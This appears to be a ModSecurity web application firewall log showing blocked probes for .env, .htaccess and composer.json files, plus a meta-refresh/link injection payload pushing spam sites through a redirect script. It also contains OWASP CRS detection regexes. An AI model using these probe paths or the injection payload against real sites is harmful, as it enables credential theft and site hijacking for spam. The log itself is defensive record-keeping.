[Mon May 11 12:23:59.117933 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.177.72.9:25062] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/tests/.env.old2024"] [unique_id "agGuP2S6k_SCYd1AVZq51QAAAQo"]
[Mon May 11 12:24:00.378382 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.177.72.9:25062] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuP2S6k_SCYd1AVZq51QAAAQo"]
[Mon May 11 12:24:00.404123 2026] [security2:error] [pid 1256241:tid 1256269] [client 185.177.72.9:25068] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tests/.env.test.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/tests/.env.test.template"] [unique_id "agGuQJkIEwRJMyDaV55aBgAAAVc"]
[Mon May 11 12:24:00.404525 2026] [security2:error] [pid 1256241:tid 1256269] [client 185.177.72.9:25068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/tests/.env.test.template"] [unique_id "agGuQJkIEwRJMyDaV55aBgAAAVc"]
[Mon May 11 12:24:01.597841 2026] [security2:error] [pid 1256241:tid 1256269] [client 185.177.72.9:25068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuQJkIEwRJMyDaV55aBgAAAVc"]
[Mon May 11 12:24:01.629023 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:25076] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tests/.env.test.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/tests/.env.test.template"] [unique_id "agGuQRjZymfuKpjWXeiIeAAAANE"]
[Mon May 11 12:24:01.629337 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:25076] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/tests/.env.test.template"] [unique_id "agGuQRjZymfuKpjWXeiIeAAAANE"]
[Mon May 11 12:24:02.850965 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:25076] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuQRjZymfuKpjWXeiIeAAAANE"]
[Mon May 11 12:24:10.143002 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:63942] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /tmp/.htaccess5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/tmp/.htaccess5"] [unique_id "agGuSkYQeUtAPynIs6xkmwAAAAE"]
[Mon May 11 12:24:10.143594 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:63942] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/tmp/.htaccess5"] [unique_id "agGuSkYQeUtAPynIs6xkmwAAAAE"]
[Mon May 11 12:24:11.319590 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:63942] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuSkYQeUtAPynIs6xkmwAAAAE"]
[Mon May 11 12:24:11.350094 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:63958] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /tmp/.htaccess5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/tmp/.htaccess5"] [unique_id "agGuS2S6k_SCYd1AVZq53QAAAQU"]
[Mon May 11 12:24:11.350334 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:63958] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/tmp/.htaccess5"] [unique_id "agGuS2S6k_SCYd1AVZq53QAAAQU"]
[Mon May 11 12:24:12.571085 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:63958] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuS2S6k_SCYd1AVZq53QAAAQU"]
[Mon May 11 12:24:22.977516 2026] [security2:error] [pid 1254212:tid 1254460] [client 185.177.72.9:18616] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /uploads/composer.json3"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/uploads/composer.json3"] [unique_id "agGuVkYQeUtAPynIs6xkrwAAABg"]
[Mon May 11 12:24:22.977832 2026] [security2:error] [pid 1254212:tid 1254460] [client 185.177.72.9:18616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/uploads/composer.json3"] [unique_id "agGuVkYQeUtAPynIs6xkrwAAABg"]
[Mon May 11 12:24:24.159789 2026] [security2:error] [pid 1254212:tid 1254460] [client 185.177.72.9:18616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuVkYQeUtAPynIs6xkrwAAABg"]
[Mon May 11 12:24:24.191232 2026] [security2:error] [pid 1254212:tid 1254233] [client 185.177.72.9:64818] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /uploads/composer.json3"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/uploads/composer.json3"] [unique_id "agGuWEYQeUtAPynIs6xksAAAABM"]
[Mon May 11 12:24:24.191796 2026] [security2:error] [pid 1254212:tid 1254233] [client 185.177.72.9:64818] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/uploads/composer.json3"] [unique_id "agGuWEYQeUtAPynIs6xksAAAABM"]
[Mon May 11 12:24:26.437617 2026] [security2:error] [pid 1254212:tid 1254233] [client 185.177.72.9:64818] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuWEYQeUtAPynIs6xksAAAABM"]
[Mon May 11 12:25:09.155945 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:60550] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env.bak-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/v1/.env.bak-update"] [unique_id "agGuhUYQeUtAPynIs6xk4QAAABI"]
[Mon May 11 12:25:09.179701 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:60550] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/v1/.env.bak-update"] [unique_id "agGuhUYQeUtAPynIs6xk4QAAABI"]
[Mon May 11 12:25:10.689767 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:60550] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuhUYQeUtAPynIs6xk4QAAABI"]
[Mon May 11 12:25:10.715690 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:60552] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env.bak-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/v1/.env.bak-update"] [unique_id "agGuhhjZymfuKpjWXeiIwwAAAMc"]
[Mon May 11 12:25:10.716192 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:60552] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/v1/.env.bak-update"] [unique_id "agGuhhjZymfuKpjWXeiIwwAAAMc"]
[Mon May 11 12:25:12.144183 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:60552] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuhhjZymfuKpjWXeiIwwAAAMc"]
[Mon May 11 12:25:17.611429 2026] [security2:error] [pid 1254212:tid 1254220] [client 194.233.64.127:62556] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://veloforum.net/proxy.php?link=https://ykm.de/workshop-37763>kampus swasta terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://veloforum.net/proxy.php?link=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGujUYQeUtAPynIs6xlBwAAAAY"]
[Mon May 11 12:25:17.613903 2026] [security2:error] [pid 1254212:tid 1254220] [client 194.233.64.127:62556] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763 /> found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763>Kampus Swasta Terbaik Di Indonesia</a><m..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGujUYQeUtAPynIs6xlBwAAAAY"]
[Mon May 11 12:25:17.616939 2026] [security2:error] [pid 1254212:tid 1254220] [client 194.233.64.127:62556] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763 /> found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGujUYQeUtAPynIs6xlBwAAAAY"]
[Mon May 11 12:25:17.979150 2026] [security2:error] [pid 1254212:tid 1254220] [client 194.233.64.127:62556] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTAC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGujUYQeUtAPynIs6xlBwAAAAY"]
[Mon May 11 12:25:17.981418 2026] [security2:error] [pid 1254212:tid 1254220] [client 194.233.64.127:62556] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://Veloforum.net/proxy.php?link=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGujUYQeUtAPynIs6xlBwAAAAY"]
[Mon May 11 12:25:17.981888 2026] [security2:error] [pid 1254212:tid 1254220] [client 194.233.64.127:62556] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGujUYQeUtAPynIs6xlBwAAAAY"]
[Mon May 11 12:25:17.983515 2026] [security2:error] [pid 1254212:tid 1254220] [client 194.233.64.127:62556] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGujUYQeUtAPynIs6xlBwAAAAY"]
[Mon May 11 12:25:18.622330 2026] [security2:error] [pid 1254133:tid 1254139] [client 194.233.64.127:62602] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://veloforum.net/proxy.php?link=https://ykm.de/workshop-37763>kampus swasta terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://veloforum.net/proxy.php?link=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGujhjZymfuKpjWXeiI4gAAAMM"]
